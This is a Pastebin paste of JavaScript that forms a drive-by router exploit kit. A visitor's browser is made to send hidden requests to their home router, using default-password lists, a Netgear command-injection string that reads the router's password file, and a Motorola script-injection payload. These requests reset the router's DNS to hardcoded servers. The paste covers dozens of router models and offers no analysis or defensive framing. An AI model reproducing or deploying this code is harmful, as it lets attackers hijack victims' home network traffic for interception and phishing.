Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var pDNS = "200.98.30.219";
- var sDNS = "155.133.82.21";
- var passlist=["pass","root","admin","123456789","123456","password","","<eopl>"];
- var gstp=400;
- var pstp=5000;
- function exp(url, data, method){
- if(method=="GET"){
- document.write('<style type="text/css">@import url('+url+'&ju='+ Math.random()+');</style>');
- if(url.indexOf('<eopl>')>0){var tm=setTimeout(function(){window.stop();},gstp);}
- }
- else{
- document.write("<body></body>");
- var ifrm = document.createElement("IFRAME");
- ifrm.height="1px";
- ifrm.width="1px";
- document.body.appendChild(ifrm);
- var f=ifrm.contentWindow.document.createElement("FORM");
- f.name='f';
- f.method=method;
- f.action=url;
- var el=data.split('&');
- for(i=0;i<el.length;i++)
- {
- var e=el[i].split('=');
- var t=ifrm.contentWindow.document.createElement('INPUT');
- t.type='TEXT';
- t.id=e[0];
- t.name=e[0];
- t.value=e[1];
- f.appendChild(t);
- }
- ifrm.contentWindow.document.body.appendChild(f);
- f.submit();
- var tm=setTimeout(function(){window.stop();},pstp);
- }
- }
- function srq(ip) {
- for(i=0;i<12;i++){
- var url1 = "http://$1$"+ip+"/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&hostName=TL-WR941ND&Save=Save";
- var method = "GET";
- url = url1.replace("$1$","");
- var cred="admin";
- if(passlist[i]!="")
- cred=cred+":"+passlist[i];
- cred = cred+"@";
- url = url1.replace("$1$",cred);
- exp(url, "", method);
- }
- }
- function e_belkin(ip)
- {
- var method = "POST";
- var url = "";
- var data ="";
- url="http://"+ip+"/cgi-bin/login.exe?pws=admin";
- exp(url, "", "GET");
- url="http://"+ip+"/cgi-bin/setup_dns.exe";
- data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"&dns2_1_t="+sDNS.split('.')[0]+"&dns2_2_t="+sDNS.split('.')[1]+"dns2_3_t="+sDNS.split('.')[2]+"&dns2_4_t="+sDNS.split('.')[3]+"&auto_from_isp=0";
- exp(url, data, method);
- }
- function e_webcam(ip)
- {
- }
- function p_exp(ip) {
- e_belkin(ip);
- e_webcam(ip);
- var method = "POST";
- var url = "";
- var data ="";
- url = "http://admin:admin@"+ip+"/apply.cgi";
- data="submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcplan_ip_addr=192.168.1.1&lan_dhcp_start=192.168.1.100&lan_dhcp_end=192.168.1.149&lan_dns0="+pDNS+"&lan_dns1="+sDNS+"&lan_netmask=255.255.255.0&machine_name=Cisco01723&lan_proto=dhcp&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&lan_dns0_0=217&lan_dns0_1=12&lan_dns0_2=208&lan_dns0_3=38&lan_dns1_0=8&lan_dns1_1=8&lan_dns1_2=8&lan_dns1_3=8";
- exp(url, data, method);
- url="http://admin:admin@"+ip+"/apply.cgi?/BAS_update.htm";
- data="submit_flag=etherðer_dnsaddr1="+pDNS+"ðer_dnsaddr2="+sDNS+"ðer_dnsaddr3=8.8.8.8&Apply=Apply";
- exp(url, data, method);
- url="http://"+ip+"/goform/AdvSetDns";
- data="GO=wan_dns.asp&rebootflag=&DESN=1&DNSEN=on&DS1="+pDNS+"&DS2="+sDNS;
- exp(url, data, method); /*Unicorn WB-3300NR*/
- url="http://"+ip+"/login.cgi";
- data="login_name=admin&login_pass=";
- exp(url, data, method);
- url="http://"+ip+"/h_wan_fix.cgi";
- data="static_dns1="+pDNS+"&static_dns2="+sDNS;
- exp(url, data, method);
- }
- function e_moto(ip)
- {
- /*var method = "GET";
- var url ="http://" + ip + "/frames.asp?userId=admin&password=motorola";
- exp(url, "", method);
- url ='http://' + ip + 'Gateway.Wan.hostName=&Gateway.Wan.dhcpClientEnabled=0&Gateway.Wan.ipAddress=0.0.0.0&Gateway.Wan.subnetMask=0.0.0.0&Gateway.Wan.defaultGateway=0.0.0.0&Gateway.Wan.dnsAddress1=3.3.3.3&Gateway.Wan.dnsAddress2=2.2.2.2&Gateway.Wan.dnsAddress3=0.0.0.0&Gateway.Wan.tcpSessionWaitTimeout=300&Gateway.Wan.udpSessionWaitTimeout=300&Gateway.Wan.icmpSessionWaitTimeout=300&urlOk=gateway%2FgatewayWAN.asp&urlError=gateway%2FgatewayWAN.asp%3FsessionId%3D2144%26error%3Derror&BUTTON_INPUT=Apply';
- exp(url, "", POST); */
- var i1 = document.createElement('IMG');
- document.body.appendChild(i1);
- var i2 = document.createElement('IMG');
- document.body.appendChild(i2);
- i1.src='http://'+ip+'/frames.asp?userId=admin&password=motorola';
- i2.src='http://'+ip+'/goformFOO/AlFrame?Gateway.VirtualServerAdvConfig.add=Add&Gateway.VirtualServerAdvConfig.serverId.entry="%27%2B(window.onload%3Dfunction(){with(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dhcpClientEnabled=0%27%3Bz=%27%27%3Bfor(c in {%27Gateway.Wan.ipAddress%27:0,%27Gateway.Wan.subnetMask%27:0,%27Gateway.Wan.defaultGateway%27:0})z%2B=c%2B%27=%27%2Bdocument.getElementById(c).value%2B%27%26%27%3Bwith(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dnsAddress1='+pDNS+'%26%27%2Bz%2B%27%26Gateway.Wan.dhcpClientEnabled=0%27})%2B%27';
- }/*Motorola*/
- function r_exp(ip) {
- var method = "GET";
- var url ="";//http://admin:admin@"+ip+"?ju="+ Math.random();
- //exp(url, "", method);
- url="http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=WW=`wget 'http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/¤tsetting.htm=1&curpath=/¤tsetting.htm=1' -O-` & wget --post-data='h_DNStype=Fixed&c4_DNS1address="+pDNS+"&c4_DNS2address="+sDNS+"&runtest=&todo=save&this_file=pppoe.htm&next_file=basic.htm' -O- 'http://$WW@"+ip+"/setup.cgi'&curpath=/¤tsetting.htm=1";
- exp(url, "", method); /*DGN 1000/DGN2200*/
- url="http://admin:admin@"+ip+"/start_apply.htm?current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&wan_unit=0&wan_enable=1&wan_nat_x=1&wan_dnsenable_x=0";
- exp(url, "", method); /*asus rt n66u*/
- url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1="+pDNS+"&wan_dns2="+sDNS+"&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&productid=RT-N56U¤t_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_proto=dhcp&wan_enable=1&wan_nat_x=1&wan_upnp_enable=1&wan_dhcpenable_x=1&wan_dnsenable_x=0&dhcpc_mode=1";
- exp(url, "", method); /*asus rt n56u*/
- url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS;
- exp(url, "", method); /*asus rt n56u*/
- url="http://"+ip+"/start_apply.htm?current_page=tcpipwan.asp&ipMode=pptp&typeForm=formWanTcpipSetup&submit-url=%2Ftcpipwan.asp&action_mode=Restart_WAN&flag=nodetect&preferred_lang=EN&wanType=autoIp&fixedIpMtuSize=1500&dnsMode=dnsManual&dns1="+pDNS+"&dns2="+sDNS;
- exp(url, "", method);/*asus nt-12*/
- url = "http://admin:admin@"+ip+"/setup.cgi?todo=wan_dns1="+pDNS+"";
- exp(url, "", method);
- url = "http://admin:admin@"+ip+"/setup_dns.stm?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
- exp(url, "", method);
- url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
- exp(url, "", method); /*Philips*/
- url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
- exp(url, "", method);/*Motorola SBG901*/
- url ="http://"+ip+"/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP"
- exp(url, "", method);
- url ="http://"+ip+"/apply.cgi?wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS;
- exp(url, "", method);
- url ="http://admin@"+ip+"/apply.cgi?wan_specify_dns=1&dhcpc_use_ucast=1&classless_static_route=0&asp_temp_51=&asp_temp_52=dhcpc&reboot_type=wan&button=Save+Settings&wan_proto=dhcpc&opendns_enable=0&dns_relay=1&hostname=DIR-615&dhcpc_use_ucast_sel=1&wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS+"&wan_mtu=1500";
- exp(url, "", method);
- url ="http://"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
- exp(url, "", method);
- url ="http://admin:password@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
- exp(url, "", method);
- url ="http://Admin:1234@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
- exp(url, "", method);
- url ="http://user:user@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
- exp(url, "", method);
- url ="http://admin:admin@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
- exp(url, "", method);
- url ="http://"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
- exp(url, "", method);
- url = "http://admin:admin@"+ip+"/router/add_dhcp_segment.cgi?dhcp_on_chk=0&dhcp_server_on=1&dhcp_start_ip1="+ip+"&dhcp_end_ip1="+ip+"54&dhcp_start_ip2=&dhcp_end_ip2=&dhcp_start_ip3=&dhcp_end_ip3=&lan_as_gw_chk=0&is_lan_as_gw=1&custom_gw=&lease_time=86400&is_router_as_dns=1&dns1="+pDNS+"&dns2="+sDNS+"&dns3=&auto_bind=1&submitbutton=+%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88+";
- exp(url, "", method);
- url = "http://user:user@"+ip+"/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1="+ip+"&ip2="+ip+"&Lease=120&gateway=0.0.0.0&domain=&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=%B1%A3+%B4%E6";
- exp(url, "", method);
- url = "http://admin:admin@"+ip+"/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip="+ip+"&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0="+pDNS.split('.')[0]+"&dns0_1="+pDNS.split('.')[1]+"&dns0_2="+pDNS.split('.')[2]+"&dns0_3="+pDNS.split('.')[3]+"&dns1_0="+sDNS.split('.')[0]+"&dns1_1="+sDNS.split('.')[1]+"&dns1_2="+sDNS.split('.')[2]+"&dns1_3="+sDNS.split('.')[3]+"&dns2_0=8&dns2_1=8&dns2_2=8&dns2_3=8&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en";
- exp(url, "", method);
- url ="http://admin:admin@"+ip+"/userRpm/WanStaticIpCfgRpm.htm@wan=0&wantype=1&ip=0.0.0.0&mask=0.0.0.0&gateway=0.0.0.0&mtu=1500&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=Save";
- exp(url, "", method);
- url ="http://"+ip+"/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&downBandwidth=0&upBandwidth=0&Save=&Advanced=Advanced";
- exp(url, "", method);
- url ="http://admin:password@"+ip+"/start_apply.htm?dnsserver="+pDNS+"&dnsserver2="+sDNS+"";
- exp(url, "", method);
- url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&uiViewNetMask=255.255.255.0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP="+ip+"00&sysPoolCount=100&dhcp_LeaseTime=259200&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+pDNS+"";
- exp(url, "", method);
- url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS;
- exp(url, "", method);
- url = "http://root:root@"+ip+"/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS
- exp(url, "", method);
- url = "http://admin:admin@"+ip+"/prim.htm?i00110004="+pDNS+"&i00110005="+sDNS+"&i00035007="+pDNS+"&i00035008="+sDNS+"&i00040700="+pDNS+"&i00040800="+sDNS+"&i001e0008="+pDNS+"&i001e0009="+sDNS+"&_sce=%25ssc";
- exp(url, "", method); /*DI 604*/
- var t=setTimeout(function(){p_exp(ip);},1000);
- srq(ip);
- e_moto(ip);
- }
- var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome');
- //if(document.referrer=="" || is_chrome<0){window.location.replace("about:blank")};
- runweb(function(ip) {
- //if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)) {
- //var gw = ["192.168.1.1","192.168.15.1", "192.168.0.1", "192.168.0.227", "10.1.1.1", "10.0.0.1", "192.168.2.1", "192.168.1.2", "192.168.2.2", "192.168.1.254"];
- var sip = ip.split(".");
- ip = sip[0] + "." + sip[1] + "." + sip[2] + ".1";
- //var i = 0;
- //var j = 0;
- //for (i = 0; i < gw.length; i++) {
- // if (ip == gw[i]) {
- // j = j + 1;
- // break;
- // }
- //};
- //i = i + 1;
- //if (j > 0) {
- r_exp(ip);
- //};
- //}
- });
Add Comment
Please, Sign In to add comment